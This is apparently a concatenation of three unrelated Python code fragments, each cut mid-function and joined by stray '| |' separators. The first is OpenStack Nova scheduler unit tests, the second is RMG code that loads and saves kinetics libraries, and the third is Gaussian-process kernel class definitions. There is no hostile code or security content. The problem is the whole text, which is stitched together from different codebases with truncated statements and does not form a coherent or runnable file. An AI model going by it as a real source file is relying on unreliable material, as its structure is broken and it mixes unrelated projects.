flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
host_state = mock.Mock(spec=host_manager.HostState, host="fake_host",
uuid=uuids.cn1, cell_uuid=uuids.cell, nodename="fake_node",
limits={}, updated="Not None")
all_host_states = [host_state]
mock_get_all_states.return_value = all_host_states
mock_get_hosts.side_effect = [all_host_states, []]
instance_uuids = [uuids.inst1, uuids.inst2]
fake_allocs_by_rp = {uuids.cn1: [{}]}
self.assertRaises(exception.NoValidHost, self.driver._schedule,
self.context, spec_obj, instance_uuids, fake_allocs_by_rp,
mock.sentinel.p_sums)
self.assertIsNone(host_state.updated)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def _test_alternates_returned(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume, num_instances=2, num_alternates=2):
all_host_states = []
alloc_reqs = {}
for num in range(10):
host_name = "host%s" % num
hs = host_manager.HostState(host_name, "node%s" % num,
uuids.cell)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
mock_sorted.return_value = all_host_states
mock_claim.return_value = True
total_returned = num_alternates + 1
self.flags(max_attempts=total_returned, group="scheduler")
instance_uuids = [getattr(uuids, "inst%s" % num)
for num in range(num_instances)]
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
dests = self.driver._schedule(self.context, spec_obj,
instance_uuids, alloc_reqs, None, return_alternates=True)
self.assertEqual(num_instances, len(dests))
# Filtering and weighing hosts should be called num_instances + 1 times
# unless num_instances == 1.
self.assertEqual(num_instances + 1 if num_instances > 1 else 1,
mock_sorted.call_count,
'Unexpected number of calls to filter hosts for %s '
'instances.' % num_instances)
selected_hosts = [dest[0] for dest in dests]
for dest in dests:
self.assertEqual(total_returned, len(dest))
# Verify that there are no duplicates among a destination
self.assertEqual(len(dest), len(set(dest)))
# Verify that none of the selected hosts appear in the alternates.
for alt in dest[1:]:
self.assertNotIn(alt, selected_hosts)
def test_alternates_returned(self):
self._test_alternates_returned(num_instances=1, num_alternates=1)
self._test_alternates_returned(num_instances=3, num_alternates=0)
self._test_alternates_returned(num_instances=1, num_alternates=4)
self._test_alternates_returned(num_instances=2, num_alternates=3)
self._test_alternates_returned(num_instances=8, num_alternates=8)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def test_alternates_same_cell(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume):
"""Tests getting alternates plus claims where the hosts are spread
across two cells.
"""
all_host_states = []
alloc_reqs = {}
for num in range(10):
host_name = "host%s" % num
cell_uuid = uuids.cell1 if num % 2 else uuids.cell2
hs = host_manager.HostState(host_name, "node%s" % num,
cell_uuid)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
# There are two instances so _get_sorted_hosts is called once per
# instance and then once again before picking alternates.
mock_sorted.side_effect = [all_host_states,
list(reversed(all_host_states)),
all_host_states]
mock_claim.return_value = True
total_returned = 3
self.flags(max_attempts=total_returned, group="scheduler")
instance_uuids = [uuids.inst1, uuids.inst2]
num_instances = len(instance_uuids)
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
dests = self.driver._schedule(self.context, spec_obj,
instance_uuids, alloc_reqs, None, return_alternates=True)
# There should be max_attempts hosts per instance (1 selected, 2 alts)
self.assertEqual(total_returned, len(dests[0]))
self.assertEqual(total_returned, len(dests[1]))
# Verify that the two selected hosts are not in the same cell.
self.assertNotEqual(dests[0][0].cell_uuid, dests[1][0].cell_uuid)
for dest in dests:
selected_host = dest[0]
selected_cell_uuid = selected_host.cell_uuid
for alternate in dest[1:]:
self.assertEqual(alternate.cell_uuid, selected_cell_uuid)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def _test_not_enough_alternates(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume, num_hosts, max_attempts):
all_host_states = []
alloc_reqs = {}
for num in range(num_hosts):
host_name = "host%s" % num
hs = host_manager.HostState(host_name, "node%s" % num,
uuids.cell)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
mock_sorted.return_value = all_host_states
mock_claim.return_value = True
# Set the total returned to more than the number of available hosts
self.flags(max_attempts=max_attempts, group="scheduler")
instance_uuids = [uuids.inst1, uuids.inst2]
num_instances = len(instance_uuids)
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
| |
float(A)
else:
A, n, Ea = items[-3:]
dA = '0'; dn = '0'; dEa = '0'
A = float(A)
kunits = Aunits[len(reactants)+1] if hasThirdBody else Aunits[len(reactants)]
if dA[0] == '*':
A = Quantity(A,kunits,'*|/',float(dA[1:]))
else:
dA = float(dA)
if dA != 0:
A = Quantity(A,kunits,'+|-',dA)
else:
A = Quantity(A,kunits)
n = float(n); dn = float(dn)
if dn != 0:
n = Quantity(n,'','+|-',dn)
else:
n = Quantity(n,'')
Ea = float(Ea); dEa = float(dEa)
if dEa != 0:
Ea = Quantity(Ea,Eunits,'+|-',dEa)
else:
Ea = Quantity(Ea,Eunits)
kinetics = Arrhenius(A=A, n=n, Ea=Ea, T0=(1.0,"K"))
if hasThirdBody:
kinetics = ThirdBody(arrheniusLow=kinetics)
reaction = Reaction(
reactants=reactants,
products=products,
kinetics=kinetics,
reversible=(arrow in ['<=>', '=']),
)
reaction.kinetics.comment = next_reaction_comment
next_reaction_comment = ""
reactions.append(reaction)
elif 'PLOG' in line:
# This line contains pressure-dependent Arrhenius parameters in Chemkin format
items = line.split('/')
P, A, n, Ea = items[1].split()
P = float(P)
A = Quantity(float(A), Aunits[len(reactants)])
n = Quantity(float(n), '')
Ea = Quantity(float(Ea), Eunits)
arrhenius = Arrhenius(A=A, n=n, Ea=Ea, T0=(1.0,"K"))
if not isinstance(kinetics, PDepArrhenius):
old_kinetics = kinetics
comment = old_kinetics.comment
old_kinetics.comment = ''
assert isinstance(old_kinetics, Arrhenius)
kinetics = PDepArrhenius(pressures=([P],"atm"), arrhenius=[arrhenius], highPlimit=old_kinetics, comment=comment)
else:
pressures = list(kinetics.pressures.values)
pressures.append(P*101325.)
kinetics.pressures.values = numpy.array(pressures, numpy.float)
kinetics.arrhenius.append(arrhenius)
reaction.kinetics = kinetics
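# A PLOG entry supplies one (P, A, n, Ea) tuple per line, e.g.
# (format sketch, values illustrative):
#     PLOG / 1.0  1.0E+13  0.0  10000.0 /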
elif 'LOW' in line:
# This line contains low-pressure-limit Arrhenius parameters in Chemkin format
# Upgrade the kinetics to a Lindemann if not already done
if isinstance(kinetics, Lindemann):
pass
elif isinstance(kinetics, ThirdBody):
kinetics = Lindemann(arrheniusHigh=kinetics.arrheniusLow,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, Arrhenius):
kinetics = Lindemann(arrheniusHigh=kinetics, comment=kinetics.comment)
kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
A, n, Ea = items[1].split()
A = Quantity(float(A), Aunits[len(reactants)+1])
n = Quantity(float(n), '')
Ea = Quantity(float(Ea), Eunits)
kinetics.arrheniusLow = Arrhenius(A=A, n=n, Ea=Ea, T0=1.0)
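# A LOW line carries the low-pressure-limit Arrhenius parameters,
# e.g. (format sketch, values illustrative):
#     LOW / 2.3E+18  -0.9  1700.0 /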
elif 'TROE' in line:
# This line contains Troe falloff parameters in Chemkin format
# Upgrade the kinetics to a Troe if not already done
if isinstance(kinetics, Lindemann):
kinetics = Troe(arrheniusLow=kinetics.arrheniusLow,
arrheniusHigh=kinetics.arrheniusHigh,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, ThirdBody):
kinetics = Troe(arrheniusHigh=kinetics.arrheniusLow,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, Arrhenius):
kinetics = Troe(arrheniusHigh=kinetics, comment=kinetics.comment)
kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
items = items[1].split()
if len(items) == 3:
alpha, T3, T1 = items; T2 = None
else:
alpha, T3, T1, T2 = items
kinetics.alpha = Quantity(float(alpha))
kinetics.T1 = Quantity(float(T1),"K")
if T2 is not None:
kinetics.T2 = Quantity(float(T2),"K")
else:
kinetics.T2 = None
kinetics.T3 = Quantity(float(T3),"K")
elif 'DUPLICATE' in line or 'DUP' in line:
reaction.duplicate = True
else:
# This line contains collider efficiencies
# Upgrade the kinetics to a Lindemann if not already done
if isinstance(kinetics, Arrhenius):
kinetics = Lindemann(arrheniusHigh=kinetics, comment=kinetics.comment)
kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
for spec, eff in zip(items[0::2], items[1::2]):
spec = str(spec).strip()
# In the old database, N2, He, Ne, and Ar were treated as special "bath gas" species
# that were not required to be in the species dictionary.
# The new database removes this special case and requires all colliders to be explicitly defined,
# so definitions for these special colliders are hardcoded here.
if spec.upper() in ['N2', 'HE', 'AR', 'NE'] and spec not in species:
if spec.upper() == 'N2':
species[spec] = Species(label='N2', molecule=[Molecule().fromSMILES('N#N')])
elif spec.upper() == 'HE':
species[spec] = Species(label='He', molecule=[Molecule().fromAdjacencyList('1 He 0')])
elif spec.upper() == 'AR':
species[spec] = Species(label='Ar', molecule=[Molecule().fromAdjacencyList('1 Ar 0')])
elif spec.upper() == 'NE':
species[spec] = Species(label='Ne', molecule=[Molecule().fromAdjacencyList('1 Ne 0')])
if spec not in species:
logging.warning('Collider {0} for reaction {1} not found in species dictionary.'.format(spec, reaction))
else:
kinetics.efficiencies[species[spec].molecule[0]] = float(eff)
if 'Unit:' in line:
inUnitSection = True; inReactionSection = False
elif 'Reactions:' in line:
inUnitSection = False; inReactionSection = True
except (DatabaseError, InvalidAdjacencyListError), e:
logging.exception('Error while reading old reactions file {0}.'.format(path))
logging.exception(str(e))
raise
except IOError, e:
logging.exception('Database dictionary file "' + e.filename + '" not found.')
raise
finally:
if fdict: fdict.close()
return reactions
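# --- Illustrative sketch (standalone, not part of the original class) ---
# A minimal model of the 'PLOG' branch above: each PLOG line contributes one
# (pressure, Arrhenius) pair, and the first such line converts the existing
# high-pressure Arrhenius into the highPlimit of a PDepArrhenius. The classes
# below are simplified stand-ins, not the real RMG objects.
class _SketchArrhenius(object):
    def __init__(self, A, n, Ea):
        self.A, self.n, self.Ea = A, n, Ea

class _SketchPDepArrhenius(object):
    def __init__(self, pressures, arrhenius, highPlimit=None):
        self.pressures = pressures    # pressures stored in Pa
        self.arrhenius = arrhenius    # parallel list of _SketchArrhenius
        self.highPlimit = highPlimit

def _add_plog_line(kinetics, P_atm, A, n, Ea):
    rate = _SketchArrhenius(A, n, Ea)
    if not isinstance(kinetics, _SketchPDepArrhenius):
        # First PLOG line: upgrade, keeping the old rate as the high-P limit
        return _SketchPDepArrhenius([P_atm * 101325.], [rate], highPlimit=kinetics)
    kinetics.pressures.append(P_atm * 101325.)
    kinetics.arrhenius.append(rate)
    return kinetics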
def saveOld(self, path):
"""
Save an old-style reaction library to `path`. This creates files named
``species.txt``, ``reactions.txt``, and ``pdepreactions.txt`` in the
given directory; these contain the species dictionary, high-pressure
limit reactions and kinetics, and pressure-dependent reactions and
kinetics, respectively.
"""
try:
os.makedirs(path)
except OSError:
pass
def writeArrhenius(f, arrhenius):
f.write(' {0:<12.3E} {1:>7.3f} {2:>11.2f} {3}{4:g} {5:g} {6:g}\n'.format(
arrhenius.A.value,
arrhenius.n.value,
arrhenius.Ea.value / 4.184,
'*' if arrhenius.A.isUncertaintyMultiplicative() else '',
arrhenius.A.uncertainty,
arrhenius.n.uncertainty,
arrhenius.Ea.uncertainty / 4.184,
))
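# For reference, a line produced by the format string above looks roughly like
#   1.000E+13     0.000     1000.00 0 0 0
# with A in the library's units, Ea converted from J/mol to cal/mol, and the
# trailing three fields holding the A, n, and Ea uncertainties.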
# Gather all of the species used in this kinetics library
speciesDict = self.getSpecies()
# Also include colliders in the above
for entry in self.entries.values():
if isinstance(entry.data, ThirdBody):
for molecule in entry.data.efficiencies:
formula = molecule.getFormula()
if formula in ['He', 'Ar', 'N2', 'Ne']:
pass
else:
found = False
for species in speciesDict.values():
for mol in species.molecule:
if mol.isIsomorphic(molecule):
found = True
break
if not found:
speciesDict[formula] = Species(label=formula, molecule=[molecule])
entries = self.entries.values()
entries.sort(key=lambda x: x.index)
# Save the species dictionary
speciesList = speciesDict.values()
speciesList.sort(key=lambda x: x.label)
f = open(os.path.join(path, 'species.txt'), 'w')
for species in speciesList:
f.write(species.molecule[0].toAdjacencyList(label=species.label, removeH=True) + "\n")
f.close()
# Save the high-pressure limit reactions
# Currently only Arrhenius kinetics are allowed
f = open(os.path.join(path, 'reactions.txt'), 'w')
f.write('Unit:\n')
f.write('A: mol/m3/s\n')
f.write('E: cal/mol\n\n')
f.write('Reactions:\n')
for entry in entries:
kinetics = entry.data
rateList = []
if isinstance(kinetics, MultiKinetics):
entry.item.duplicate = True
for rate in kinetics.kineticsList:
if not rate.isPressureDependent():
rateList.append(rate)
else:
if not kinetics.isPressureDependent():
rateList.append(kinetics)
for rate in rateList:
# Write reaction equation
f.write('{0:<59}'.format(entry.item))
# Write kinetics
if isinstance(rate, Arrhenius):
writeArrhenius(f, rate)
else:
raise DatabaseError('Unexpected kinetics type "{0}" encountered while saving old kinetics library (reactions.txt).'.format(rate.__class__))
# Mark as duplicate if needed
if entry.item.duplicate:
f.write(' DUPLICATE\n')
f.close()
# Save the pressure-dependent reactions
# Currently only ThirdBody, Lindemann, Troe, and PDepArrhenius kinetics are allowed
f = open(os.path.join(path, 'pdepreactions.txt'), 'w')
f.write('Unit:\n')
f.write('A: mol/m3/s\n')
f.write('E: cal/mol\n\n')
f.write('Reactions:\n')
for entry in entries:
kinetics = entry.data
if not kinetics.isPressureDependent():
continue
rateList = []
if isinstance(kinetics, MultiKinetics):
entry.item.duplicate = True
for rate in kinetics.kineticsList:
if rate.isPressureDependent():
rateList.append(rate)
else:
rateList.append(kinetics)
for rate in rateList:
# Write reaction equation
equation = str(entry.item)
if entry.item.reversible:
index = equation.find('<=>')
else:
index = equation.find('=>')
if isinstance(rate, ThirdBody) and not isinstance(rate, Lindemann):
equation = '{0}+ M {1} + M'.format(equation[0:index], equation[index:])
elif isinstance(rate, PDepArrhenius):
pass
else:
equation = '{0}(+M) {1} (+M)'.format(equation[0:index], equation[index:])
f.write('{0:<59}'.format(equation))
# Write kinetics
if isinstance(rate, ThirdBody):
if isinstance(rate, Lindemann):
# Lindemann (and Troe) fall-off have the High-P as default, and Low-P labeled LOW
writeArrhenius(f, rate.arrheniusHigh)
else:
# Non-falloff ThirdBody reactions are always in the Low-P limit
writeArrhenius(f, rate.arrheniusLow)
if len(rate.efficiencies) > 0:
eff_line = ''
for molecule, efficiency in rate.efficiencies.iteritems():
for spec in speciesDict.values():
if molecule in spec.molecule:
mol_label = spec.label
break
else:
mol_label = molecule.getFormula().upper()
eff_line += '{0}/{1:g}/ '.format(mol_label, efficiency)
f.write(eff_line.strip() + '\n')
if isinstance(rate, Lindemann):
f.write(' LOW / {0:10.3e} {1:9.3f} {2:10.2f}/\n'.format(
rate.arrheniusLow.A.value,
rate.arrheniusLow.n.value,
rate.arrheniusLow.Ea.value / 4.184,
))
if isinstance(rate, Troe):
if rate.T2 is not None:
f.write(' TROE / {0:10.4f} {1:10.2g} {2:10.2g} {3:10.2g}/\n'.format(
rate.alpha.value,
rate.T3.value,
rate.T1.value,
rate.T2.value,
))
else:
f.write(' TROE / {0:10.4f} {1:10.2g} {2:10.2g}/\n'.format(
rate.alpha.value,
rate.T3.value,
rate.T1.value,
))
elif isinstance(rate, PDepArrhenius):
writeArrhenius(f, rate.arrhenius[-1])
for pressure, arrhenius in zip(rate.pressures.values, rate.arrhenius):
f.write(' PLOG / {0:10g} {1:10.3e} {2:9.3f} {3:10.2f} /\n'.format(
pressure / 1e5,
arrhenius.A.value,
arrhenius.n.value,
arrhenius.Ea.value / 4.184,
))
else:
raise DatabaseError('Unexpected kinetics type "{0}" encountered while saving old kinetics library (pdepreactions.txt).'.format(rate.__class__))
# Mark as duplicate if needed
if entry.item.duplicate:
f.write(' DUPLICATE\n')
f.write('\n')
f.close()
################################################################################
class KineticsGroups(Database):
"""
A class for working with the group additivity values of an RMG kinetics family.
"""
def __init__(self,
entries=None,
top=None,
label='',
name='',
shortDesc='',
longDesc='',
forwardTemplate=None,
forwardRecipe=None,
reverseTemplate=None,
reverseRecipe=None,
forbidden=None
):
Database.__init__(self, entries, top, label, name, shortDesc, longDesc)
self.numReactants = 0
def __repr__(self):
return '<KineticsGroups "{0}">'.format(self.label)
def loadEntry(self, index, label, group, kinetics, reference=None, referenceType='', shortDesc='', longDesc='', history=None):
if group[0:3].upper() == 'OR{' or group[0:4].upper() == 'AND{' or group[0:7].upper() == 'NOT OR{' or group[0:8].upper() == 'NOT AND{':
item = makeLogicNode(group)
else:
item = Group().fromAdjacencyList(group)
self.entries[label] = Entry(
index = index,
label = label,
item = item,
data = kinetics,
reference = reference,
referenceType = referenceType,
shortDesc = shortDesc,
longDesc = longDesc.strip(),
history = history or [],
)
def | |
def pretty_print(self):
return colored('CS', self.depth())
def default(self, eff_dimensions):
return ConstKernel(0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Const'
@staticmethod
def description():
return "Constant"
@staticmethod
def params_description():
return "Output variance"
class ConstKernel(BaseKernel):
def __init__(self, output_variance, eff_dimensions):
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return ConstKernelFamily()
def gpml_kernel_expression(self):
return '{@covConst}'
def english_name(self):
return 'CS'
def id_name(self):
return 'Const'
def param_vector(self):
# order of args matches GPML
return np.array([self.output_variance, self.eff_dimensions])
def copy(self):
return ConstKernel(self.output_variance, self.eff_dimensions)
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == 0:
# Set scale factor with output scale
result[0] = np.random.normal(loc=data_shape['output_scale'], scale=sd)
return result
def __repr__(self):
return 'ConstKernel(output_variance=%f, eff_dimensions=%s)' % \
(self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('CS(sf=%1.1f, dim=%s)' % (self.output_variance, ','.join([str(x) for x in self.eff_dimensions])),
self.depth())
def latex_print(self):
return 'CS'
def id_name(self):
return 'Const'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
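# --- Hedged sketch of the comparison convention used by every kernel here ---
# Parameter differences are passed through shrink_below_tolerance (defined
# elsewhere in this file) before comparing, so kernels whose parameters differ
# only negligibly compare as equal under Python 2 cmp semantics.
_a = ConstKernel(output_variance=1.0, eff_dimensions=[0])
_b = ConstKernel(output_variance=1.0 + 1e-12, eff_dimensions=[0])
print(_a.__cmp__(_b))   # expected 0, assuming 1e-12 is below the tolerance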
class LinKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, lengthscale, location, eff_dimensions = params
return LinKernel(offset=offset, lengthscale=lengthscale, location=location, eff_dimensions=eff_dimensions)
def num_params(self):
return 4
def pretty_print(self):
return colored('LN', self.depth())
def default(self, eff_dimensions):
return LinKernel(-2.0, 0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Lin'
@staticmethod
def description():
return "Linear"
@staticmethod
def params_description():
return "bias"
class LinKernel(BaseKernel):
# FIXME - Caution - magic numbers! This one means offset of essentially zero and scale of 1
# FIXME - lengthscale is actually an inverse scale
def __init__(self, offset, lengthscale, location, eff_dimensions):
self.offset = offset
self.lengthscale = lengthscale
self.location = location
self.eff_dimensions = eff_dimensions
def family(self):
return LinKernelFamily()
def gpml_kernel_expression(self):
return '{@covSum, {@covConst, @covLINscaleshift}}'
def english_name(self):
return 'LN'
def id_name(self):
return 'Lin'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.lengthscale, self.location, self.eff_dimensions])
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == -2:
#### Caution - magic numbers - Offset assumed to be near zero since non zero means covered by constant kernel
result[0] = np.random.normal(loc=-10, scale=sd)
if result[1] == 0:
# Lengthscale scales with ratio of y std and x std (gradient = delta y / delta x)
if np.random.rand() < 0.5:
result[1] = np.random.normal(loc=data_shape['output_scale'] - data_shape['input_scale'], scale=sd)
else:
result[1] = np.random.normal(loc=0, scale=sd)
if result[2] == 0:
# Location moves with input location, and variance scales in input variance
result[2] = np.random.normal(loc=data_shape['input_location'], scale=sd*np.exp(data_shape['input_scale']))
return result
def effective_params(self):
'''It's linear regression'''
return 2
def copy(self):
return LinKernel(offset=self.offset, lengthscale=self.lengthscale, location=self.location, eff_dimensions=self.eff_dimensions)
def __repr__(self):
return 'LinKernel(offset=%f, lengthscale=%f, location=%f, eff_dimensions=%s)' % \
(self.offset, self.lengthscale, self.location, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('LN(off=%1.1f, ell=%1.1f, loc=%1.1f, dim=%s)' % (self.offset, self.lengthscale, self.location,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'Lin'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.lengthscale - other.lengthscale, self.location - other.location]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.lengthscale - other.lengthscale]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
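# --- Hedged sketch of the sentinel convention flagged in the FIXME above ---
# The family default encodes "unset" as offset=-2.0 and zero lengthscale and
# location; default_params_replaced then swaps these sentinels for
# data-driven draws (offset ~ N(-10, sd), i.e. essentially zero). Assumes the
# Python 2 / old-NumPy environment this file targets.
_lin = LinKernel(offset=-2.0, lengthscale=0., location=0., eff_dimensions=[0])
_shape = {'output_scale': 1.0, 'input_scale': 0.5, 'input_location': 3.0}
print(_lin.default_params_replaced(sd=1, data_shape=_shape))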
class QuadraticKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, output_variance, eff_dimensions = params
return QuadraticKernel(offset, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('QD', self.depth())
def default(self, eff_dimensions):
return QuadraticKernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Quad'
@staticmethod
def description():
return "Quadratic"
@staticmethod
def params_description():
return "offset"
class QuadraticKernel(BaseKernel):
def __init__(self, offset, output_variance, eff_dimensions):
#### FIXME - Should the offset default to something small? Or will we never use this kernel?
#### If using this kernel we should also add the default params replaced function
self.offset = offset
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return QuadraticKernelFamily()
def gpml_kernel_expression(self):
return '{@covPoly, 2}'
def english_name(self):
return 'QD'
def id_name(self):
return 'Quad'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.output_variance, self.eff_dimensions])
def copy(self):
return QuadraticKernel(self.offset, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'QuadraticKernel(offset=%f, output_variance=%f, eff_dimensions=%s)' % \
(self.offset, self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('QD(off=%1.1f, sf=%1.1f, dim=%s)' % (self.offset, self.output_variance,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'QD'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.offset - other.offset, self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class CubicKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, output_variance, eff_dimensions = params
return CubicKernel(offset, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('CB', self.depth())
def default(self, eff_dimensions):
return CubicKernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Cubic'
@staticmethod
def description():
return "Cubic"
@staticmethod
def params_description():
return "offset"
class CubicKernel(BaseKernel):
def __init__(self, offset, output_variance, eff_dimensions):
#### FIXME - Should the offset default to something small? Or will we never use this kernel?
#### If using this kernel we should also add the default params replaced function
self.offset = offset
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return CubicKernelFamily()
def gpml_kernel_expression(self):
return '{@covPoly, 3}'
def english_name(self):
return 'CB'
def id_name(self):
return 'Cubic'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.output_variance, self.eff_dimensions])
def copy(self):
return CubicKernel(self.offset, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'CubicKernel(offset=%f, output_variance=%f, eff_dimensions=%s)' % \
(self.offset, self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('CB(off=%1.1f, sf=%1.1f, dim=%s)' % (self.offset, self.output_variance,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'CB'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.offset - other.offset, self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class PP0KernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
lengthscale, output_variance, eff_dimensions = params
return PP0Kernel(lengthscale, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('P0', self.depth())
def default(self, eff_dimensions):
return PP0Kernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'PP0'
@staticmethod
def description():
return "Piecewise Polynomial 0"
@staticmethod
def params_description():
return "lengthscale"
class PP0Kernel(BaseKernel):
def __init__(self, lengthscale, output_variance, eff_dimensions):
self.output_variance = output_variance
self.lengthscale = lengthscale
self.eff_dimensions = eff_dimensions
def family(self):
return PP0KernelFamily()
def gpml_kernel_expression(self):
return '{@covPPiso, 0}'
def english_name(self):
return 'P0'
def id_name(self):
return 'PP0'
def param_vector(self):
# order of args matches GPML
return np.array([self.lengthscale, self.output_variance, self.eff_dimensions])
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == 0:
# Set lengthscale with input scale
if np.random.rand() < 0.5:
result[0] = np.random.normal(loc=data_shape['input_scale'], scale=sd)
else:
result[0] = np.random.normal(loc=0, scale=sd)
if result[1] == 0:
# Set scale factor with output scale
if np.random.rand() < 0.5:
result[1] = np.random.normal(loc=data_shape['output_scale'], scale=sd)
else:
result[1] = np.random.normal(loc=0, scale=sd)
return result
def copy(self):
